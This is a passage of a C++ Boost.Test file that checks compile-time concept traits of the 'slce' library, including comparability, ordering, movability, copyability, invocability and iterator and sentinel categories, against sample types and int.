BOOST_CHECK_EQUAL( ( slce::is_equality_comparable_with< int, const int >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_equality_comparable_with< int, volatile int >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_equality_comparable_with< int, int& >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_equality_comparable_with< int, int* >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_equality_comparable_with< const int, int >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_equality_comparable_with< volatile int, int >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_equality_comparable_with< int&, int >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_equality_comparable_with< int*, int >::value ), false );
}
BOOST_AUTO_TEST_CASE(StrictTotallyOrdered) {
BOOST_CHECK_EQUAL( ( slce::is_strict_totally_ordered< comparable >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_strict_totally_ordered< const comparable >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_strict_totally_ordered< volatile comparable >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_strict_totally_ordered< comparable& >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_strict_totally_ordered< comparable* >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_strict_totally_ordered< comparable_inconvertible >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_strict_totally_ordered< const comparable_inconvertible >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_strict_totally_ordered< volatile comparable_inconvertible >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_strict_totally_ordered< comparable_inconvertible& >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_strict_totally_ordered< comparable_inconvertible* >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_strict_totally_ordered< partially_comparable >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_strict_totally_ordered< const partially_comparable >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_strict_totally_ordered< volatile partially_comparable >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_strict_totally_ordered< partially_comparable& >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_strict_totally_ordered< partially_comparable* >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_strict_totally_ordered< int >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_strict_totally_ordered< const int >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_strict_totally_ordered< volatile int >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_strict_totally_ordered< int& >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_strict_totally_ordered< int* >::value ), true );
}
BOOST_AUTO_TEST_CASE(StrictTotallyOrderedWith) {
BOOST_CHECK_EQUAL( ( slce::is_strict_totally_ordered_with< comparable, comparable >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_strict_totally_ordered_with< comparable, const comparable >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_strict_totally_ordered_with< comparable, volatile comparable >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_strict_totally_ordered_with< comparable, comparable& >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_strict_totally_ordered_with< comparable, comparable* >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_strict_totally_ordered_with< const comparable, comparable >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_strict_totally_ordered_with< volatile comparable, comparable >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_strict_totally_ordered_with< comparable&, comparable >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_strict_totally_ordered_with< comparable*, comparable >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_strict_totally_ordered_with< comparable, comparable_inconvertible >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_strict_totally_ordered_with< comparable_inconvertible, comparable >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_strict_totally_ordered_with< comparable, comparable_convertible >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_strict_totally_ordered_with< comparable_convertible, comparable >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_strict_totally_ordered_with< incomparable, incomparable >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_strict_totally_ordered_with< comparable, incomparable >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_strict_totally_ordered_with< incomparable, comparable >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_strict_totally_ordered_with< int, int >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_strict_totally_ordered_with< int, const int >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_strict_totally_ordered_with< int, volatile int >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_strict_totally_ordered_with< int, int& >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_strict_totally_ordered_with< int, int* >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_strict_totally_ordered_with< const int, int >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_strict_totally_ordered_with< volatile int, int >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_strict_totally_ordered_with< int&, int >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_strict_totally_ordered_with< int*, int >::value ), false );
}
BOOST_AUTO_TEST_CASE(Movable) {
BOOST_CHECK_EQUAL( ( slce::is_movable< base >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_movable< const base >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_movable< volatile base >::value ), false ); //
BOOST_CHECK_EQUAL( ( slce::is_movable< base& >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_movable< base* >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_movable< copyable >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_movable< const copyable >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_movable< volatile copyable >::value ), false ); //
BOOST_CHECK_EQUAL( ( slce::is_movable< copyable& >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_movable< copyable* >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_movable< movable >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_movable< const movable >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_movable< volatile movable >::value ), false ); //
BOOST_CHECK_EQUAL( ( slce::is_movable< movable& >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_movable< movable* >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_movable< non_copyable >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_movable< const non_copyable >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_movable< volatile non_copyable >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_movable< non_copyable& >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_movable< non_copyable* >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_movable< int >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_movable< const int >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_movable< volatile int >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_movable< int& >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_movable< int* >::value ), true );
}
BOOST_AUTO_TEST_CASE(Copyable) {
BOOST_CHECK_EQUAL( ( slce::is_copyable< base >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_copyable< const base >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_copyable< volatile base >::value ), false ); //
BOOST_CHECK_EQUAL( ( slce::is_copyable< base& >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_copyable< base* >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_copyable< copyable >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_copyable< const copyable >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_copyable< volatile copyable >::value ), false ); //
BOOST_CHECK_EQUAL( ( slce::is_copyable< copyable& >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_copyable< copyable* >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_copyable< movable >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_copyable< const movable >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_copyable< volatile movable >::value ), false ); //
BOOST_CHECK_EQUAL( ( slce::is_copyable< movable& >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_copyable< movable* >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_copyable< non_copyable >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_copyable< const non_copyable >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_copyable< volatile non_copyable >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_copyable< non_copyable& >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_copyable< non_copyable* >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_copyable< int >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_copyable< const int >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_copyable< volatile int >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_copyable< int& >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_copyable< int* >::value ), true );
}
BOOST_AUTO_TEST_CASE(Semiregular) {
BOOST_CHECK_EQUAL( ( slce::is_semiregular< base >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_semiregular< const base >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_semiregular< volatile base >::value ), false ); //
BOOST_CHECK_EQUAL( ( slce::is_semiregular< base& >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_semiregular< base* >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_semiregular< copyable >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_semiregular< const copyable >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_semiregular< volatile copyable >::value ), false ); //
BOOST_CHECK_EQUAL( ( slce::is_semiregular< copyable& >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_semiregular< copyable* >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_semiregular< movable >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_semiregular< const movable >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_semiregular< volatile movable >::value ), false ); //
BOOST_CHECK_EQUAL( ( slce::is_semiregular< movable& >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_semiregular< movable* >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_semiregular< non_copyable >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_semiregular< const non_copyable >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_semiregular< volatile non_copyable >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_semiregular< non_copyable& >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_semiregular< non_copyable* >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_semiregular< int >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_semiregular< const int >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_semiregular< volatile int >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_semiregular< int& >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_semiregular< int* >::value ), true );
}
BOOST_AUTO_TEST_CASE(Regular) {
BOOST_CHECK_EQUAL( ( slce::is_regular< base >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_regular< const base >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_regular< volatile base >::value ), false ); //
BOOST_CHECK_EQUAL( ( slce::is_regular< base& >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_regular< base* >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_regular< copyable >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_regular< const copyable >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_regular< volatile copyable >::value ), false ); //
BOOST_CHECK_EQUAL( ( slce::is_regular< copyable& >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_regular< copyable* >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_regular< movable >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_regular< const movable >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_regular< volatile movable >::value ), false ); //
BOOST_CHECK_EQUAL( ( slce::is_regular< movable& >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_regular< movable* >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_regular< non_copyable >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_regular< const non_copyable >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_regular< volatile non_copyable >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_regular< non_copyable& >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_regular< non_copyable* >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_regular< int >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_regular< const int >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_regular< volatile int >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_regular< int& >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_regular< int* >::value ), true );
}
BOOST_AUTO_TEST_CASE(Invocable) {
#ifdef __cpp_lib_invoke
BOOST_CHECK_EQUAL( ( slce::is_invocable< void(*)() >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_invocable< void(*)(), int >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_invocable< void(*)( int ) >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_invocable< void(*)( int ), int >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_invocable< callable, int >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_invocable< callable, int, int >::value ), true );
#else
BOOST_CHECK_EQUAL( ( slce::is_invocable< void(*)() >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_invocable< void(*)(), int >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_invocable< void(*)( int ) >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_invocable< void(*)( int ), int >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_invocable< callable, int >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_invocable< callable, int, int >::value ), false );
#endif
}
BOOST_AUTO_TEST_CASE(RegularInvocable) {
#ifdef __cpp_lib_invoke
BOOST_CHECK_EQUAL( ( slce::is_regular_invocable< void(*)() >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_regular_invocable< void(*)(), int >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_regular_invocable< void(*)( int ) >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_regular_invocable< void(*)( int ), int >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_regular_invocable< callable, int >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_regular_invocable< callable, int, int >::value ), true );
#else
BOOST_CHECK_EQUAL( ( slce::is_regular_invocable< void(*)() >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_regular_invocable< void(*)(), int >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_regular_invocable< void(*)( int ) >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_regular_invocable< void(*)( int ), int >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_regular_invocable< callable, int >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_regular_invocable< callable, int, int >::value ), false );
#endif
}
BOOST_AUTO_TEST_CASE(Predicate) {
#ifdef __cpp_lib_invoke
BOOST_CHECK_EQUAL( ( slce::is_predicate< void(*)() >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_predicate< void(*)(), int >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_predicate< void(*)( int ) >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_predicate< void(*)( int ), int >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_predicate< bool(*)( int ) >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_predicate< bool(*)( int ), int >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_predicate< callable, int >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_predicate< callable, int, int >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_predicate< predicate, base >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_predicate< predicate, base, other >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_predicate< relation, base, other >::value ), true );
#else
BOOST_CHECK_EQUAL( ( slce::is_predicate< void(*)() >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_predicate< void(*)(), int >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_predicate< void(*)( int ) >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_predicate< void(*)( int ), int >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_predicate< bool(*)( int ) >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_predicate< bool(*)( int ), int >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_predicate< callable, int >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_predicate< callable, int, int >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_predicate< predicate, base >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_predicate< predicate, base, other >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_predicate< relation, base, other >::value ), false );
#endif
}
BOOST_AUTO_TEST_CASE(Relation) {
#ifdef __cpp_lib_invoke
BOOST_CHECK_EQUAL( ( slce::is_relation< callable, base, other >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_relation< predicate, base, other >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_relation< relation, base, other >::value ), true );
#else
BOOST_CHECK_EQUAL( ( slce::is_relation< callable, base, other >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_relation< predicate, base, other >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_relation< relation, base, other >::value ), false );
#endif
}
BOOST_AUTO_TEST_CASE(StrictWeakOrder) {
#ifdef __cpp_lib_invoke
BOOST_CHECK_EQUAL( ( slce::is_strict_weak_order< callable, base, other >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_strict_weak_order< predicate, base, other >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_strict_weak_order< relation, base, other >::value ), true );
#else
BOOST_CHECK_EQUAL( ( slce::is_strict_weak_order< callable, base, other >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_strict_weak_order< predicate, base, other >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_strict_weak_order< relation, base, other >::value ), false );
#endif
}
BOOST_AUTO_TEST_CASE(Cpp17Iterator) {
BOOST_CHECK_EQUAL( ( slce::detail::is_cpp17_iterator< base >::value ), false );
BOOST_CHECK_EQUAL( ( slce::detail::is_cpp17_iterator< explicit_forward_iterator >::value ), true );
BOOST_CHECK_EQUAL( ( slce::detail::is_cpp17_iterator< implicit_forward_iterator >::value ), true );
BOOST_CHECK_EQUAL( ( slce::detail::is_cpp17_iterator< explicit_bidirectional_iterator >::value ), true );
BOOST_CHECK_EQUAL( ( slce::detail::is_cpp17_iterator< implicit_bidirectional_iterator >::value ), true );
BOOST_CHECK_EQUAL( ( slce::detail::is_cpp17_iterator< explicit_random_access_iterator >::value ), true );
BOOST_CHECK_EQUAL( ( slce::detail::is_cpp17_iterator< implicit_random_access_iterator >::value ), true );
}
BOOST_AUTO_TEST_CASE(Cpp17InputIterator) {
BOOST_CHECK_EQUAL( ( slce::detail::is_cpp17_input_iterator< base >::value ), false );
BOOST_CHECK_EQUAL( ( slce::detail::is_cpp17_input_iterator< explicit_forward_iterator >::value ), true );
BOOST_CHECK_EQUAL( ( slce::detail::is_cpp17_input_iterator< implicit_forward_iterator >::value ), true );
BOOST_CHECK_EQUAL( ( slce::detail::is_cpp17_input_iterator< explicit_bidirectional_iterator >::value ), true );
BOOST_CHECK_EQUAL( ( slce::detail::is_cpp17_input_iterator< implicit_bidirectional_iterator >::value ), true );
BOOST_CHECK_EQUAL( ( slce::detail::is_cpp17_input_iterator< explicit_random_access_iterator >::value ), true );
BOOST_CHECK_EQUAL( ( slce::detail::is_cpp17_input_iterator< implicit_random_access_iterator >::value ), true );
}
BOOST_AUTO_TEST_CASE(Cpp17ForwardIterator) {
BOOST_CHECK_EQUAL( ( slce::detail::is_cpp17_forward_iterator< base >::value ), false );
BOOST_CHECK_EQUAL( ( slce::detail::is_cpp17_forward_iterator< explicit_forward_iterator >::value ), true );
BOOST_CHECK_EQUAL( ( slce::detail::is_cpp17_forward_iterator< implicit_forward_iterator >::value ), true );
BOOST_CHECK_EQUAL( ( slce::detail::is_cpp17_forward_iterator< explicit_bidirectional_iterator >::value ), true );
BOOST_CHECK_EQUAL( ( slce::detail::is_cpp17_forward_iterator< implicit_bidirectional_iterator >::value ), true );
BOOST_CHECK_EQUAL( ( slce::detail::is_cpp17_forward_iterator< explicit_random_access_iterator >::value ), true );
BOOST_CHECK_EQUAL( ( slce::detail::is_cpp17_forward_iterator< implicit_random_access_iterator >::value ), true );
}
BOOST_AUTO_TEST_CASE(Cpp17BidirectionalIterator) {
BOOST_CHECK_EQUAL( ( slce::detail::is_cpp17_bidirectional_iterator< base >::value ), false );
BOOST_CHECK_EQUAL( ( slce::detail::is_cpp17_bidirectional_iterator< explicit_forward_iterator >::value ), false );
BOOST_CHECK_EQUAL( ( slce::detail::is_cpp17_bidirectional_iterator< implicit_forward_iterator >::value ), false );
BOOST_CHECK_EQUAL( ( slce::detail::is_cpp17_bidirectional_iterator< explicit_bidirectional_iterator >::value ), true );
BOOST_CHECK_EQUAL( ( slce::detail::is_cpp17_bidirectional_iterator< implicit_bidirectional_iterator >::value ), true );
BOOST_CHECK_EQUAL( ( slce::detail::is_cpp17_bidirectional_iterator< explicit_random_access_iterator >::value ), true );
BOOST_CHECK_EQUAL( ( slce::detail::is_cpp17_bidirectional_iterator< implicit_random_access_iterator >::value ), true );
}
BOOST_AUTO_TEST_CASE(Cpp17RandomAccessIterator) {
BOOST_CHECK_EQUAL( ( slce::detail::is_cpp17_random_access_iterator< base >::value ), false );
BOOST_CHECK_EQUAL( ( slce::detail::is_cpp17_random_access_iterator< explicit_forward_iterator >::value ), false );
BOOST_CHECK_EQUAL( ( slce::detail::is_cpp17_random_access_iterator< implicit_forward_iterator >::value ), false );
BOOST_CHECK_EQUAL( ( slce::detail::is_cpp17_random_access_iterator< explicit_bidirectional_iterator >::value ), false );
BOOST_CHECK_EQUAL( ( slce::detail::is_cpp17_random_access_iterator< implicit_bidirectional_iterator >::value ), false );
BOOST_CHECK_EQUAL( ( slce::detail::is_cpp17_random_access_iterator< explicit_random_access_iterator >::value ), true );
BOOST_CHECK_EQUAL( ( slce::detail::is_cpp17_random_access_iterator< implicit_random_access_iterator >::value ), true );
}
BOOST_AUTO_TEST_CASE(Readable) {
BOOST_CHECK_EQUAL( ( slce::is_readable< base >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_readable< explicit_forward_iterator >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_readable< implicit_forward_iterator >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_readable< explicit_bidirectional_iterator >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_readable< implicit_bidirectional_iterator >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_readable< explicit_random_access_iterator >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_readable< implicit_random_access_iterator >::value ), true );
}
BOOST_AUTO_TEST_CASE(Writable) {
BOOST_CHECK_EQUAL( ( slce::is_writable< base, int >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_writable< explicit_forward_iterator, int >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_writable< implicit_forward_iterator, int >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_writable< explicit_bidirectional_iterator, int >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_writable< implicit_bidirectional_iterator, int >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_writable< explicit_random_access_iterator, int >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_writable< implicit_random_access_iterator, int >::value ), true );
}
BOOST_AUTO_TEST_CASE(WeaklyIncrementable) {
BOOST_CHECK_EQUAL( ( slce::is_weakly_incrementable< base >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_weakly_incrementable< explicit_forward_iterator >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_weakly_incrementable< implicit_forward_iterator >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_weakly_incrementable< explicit_bidirectional_iterator >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_weakly_incrementable< implicit_bidirectional_iterator >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_weakly_incrementable< explicit_random_access_iterator >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_weakly_incrementable< implicit_random_access_iterator >::value ), true );
}
BOOST_AUTO_TEST_CASE(Incrementable) {
BOOST_CHECK_EQUAL( ( slce::is_incrementable< base >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_incrementable< explicit_forward_iterator >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_incrementable< implicit_forward_iterator >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_incrementable< explicit_bidirectional_iterator >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_incrementable< implicit_bidirectional_iterator >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_incrementable< explicit_random_access_iterator >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_incrementable< implicit_random_access_iterator >::value ), true );
}
BOOST_AUTO_TEST_CASE(Iterator) {
BOOST_CHECK_EQUAL( ( slce::is_iterator< base >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_iterator< explicit_input_iterator >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_iterator< implicit_input_iterator >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_iterator< explicit_forward_iterator >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_iterator< implicit_forward_iterator >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_iterator< explicit_bidirectional_iterator >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_iterator< implicit_bidirectional_iterator >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_iterator< explicit_random_access_iterator >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_iterator< implicit_random_access_iterator >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_iterator< sentinel< explicit_forward_iterator > >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_iterator< sentinel< implicit_forward_iterator > >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_iterator< sentinel< explicit_bidirectional_iterator > >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_iterator< sentinel< implicit_bidirectional_iterator > >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_iterator< sentinel< explicit_random_access_iterator > >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_iterator< sentinel< implicit_random_access_iterator > >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_iterator< int* >::value ), true );
}
BOOST_AUTO_TEST_CASE(Sentinel) {
BOOST_CHECK_EQUAL( ( slce::is_sentinel< base, base >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_sentinel< explicit_input_iterator, explicit_input_iterator >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_sentinel< implicit_input_iterator, implicit_input_iterator >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_sentinel< explicit_forward_iterator, explicit_forward_iterator >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_sentinel< implicit_forward_iterator, implicit_forward_iterator >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_sentinel< explicit_bidirectional_iterator, explicit_bidirectional_iterator >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_sentinel< implicit_bidirectional_iterator, implicit_bidirectional_iterator >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_sentinel< explicit_random_access_iterator, explicit_random_access_iterator >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_sentinel< implicit_random_access_iterator, implicit_random_access_iterator >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_sentinel< sentinel< explicit_forward_iterator >, explicit_forward_iterator >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_sentinel< sentinel< implicit_forward_iterator >, implicit_forward_iterator >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_sentinel< sentinel< explicit_bidirectional_iterator >, explicit_bidirectional_iterator >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_sentinel< sentinel< implicit_bidirectional_iterator >, implicit_bidirectional_iterator >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_sentinel< sentinel< explicit_random_access_iterator >, explicit_random_access_iterator >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_sentinel< sentinel< implicit_random_access_iterator >, implicit_random_access_iterator >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_sentinel< sentinel< int* >, int* >::value ), true );
}
BOOST_AUTO_TEST_CASE(SizedSentinel) {
BOOST_CHECK_EQUAL( ( slce::is_sized_sentinel< base, base >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_sized_sentinel< explicit_input_iterator, explicit_input_iterator >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_sized_sentinel< implicit_input_iterator, implicit_input_iterator >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_sized_sentinel< explicit_forward_iterator, explicit_forward_iterator >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_sized_sentinel< implicit_forward_iterator, implicit_forward_iterator >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_sized_sentinel< explicit_bidirectional_iterator, explicit_bidirectional_iterator >::value ), true );
